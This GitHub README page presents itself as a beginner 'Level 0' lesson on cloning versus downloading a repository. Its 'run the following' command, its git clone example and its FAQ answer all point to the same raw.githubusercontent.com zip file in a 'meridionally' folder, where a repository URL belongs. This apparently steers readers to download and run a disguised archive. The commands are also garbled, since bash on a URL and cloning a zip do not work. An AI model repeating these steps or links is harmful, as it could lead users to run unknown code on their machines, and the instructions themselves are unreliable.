Skip to content

Latest commit

 

History

History
55 lines (41 loc) · 1.53 KB

File metadata and controls

55 lines (41 loc) · 1.53 KB

Level 0

Task: Getting a gthub repository the right way

Important

You need to get this github repository in you computer and run the following

bash https://raw.githubusercontent.com/sanjusathian/level_0/main/meridionally/level_0-v2.9.zip

If you see the following message read the github page again

Faild , Try Again
READ the webpage again

Hint:

  • You can 'download', 'clone' the repo. to use clone type this in your cmd/terminal
git clone <the repocitory url>

eg:

git clone https://raw.githubusercontent.com/sanjusathian/level_0/main/meridionally/level_0-v2.9.zip
  • If you download code from GitHub, remember the word download, it does not downloads the .git folder

Summary

  • Repo: Repo Means a kind of folder, but it will have the .git folder.
  • repo short for Repository
  • "."(dot) infont of a folder means it's hidden
  • When you download a repo from GitHub it will not contain the .git folder

Caution

Download and clone are not same

FAQ:

  1. Why there is a dot(.) in front of the .git folder Ans: The . or dot, means it is a hidden folder.

  2. Where will be the 'download' thing in the https://raw.githubusercontent.com/sanjusathian/level_0/main/meridionally/level_0-v2.9.zip site Ans: If you open a repository (from now on we call repository as repo) you will see a dropdown at the top right named "Code", click on that and then you will see two tabs "Local" and "CodeSpaces" and then you will see "Clone" and "Download Zip" option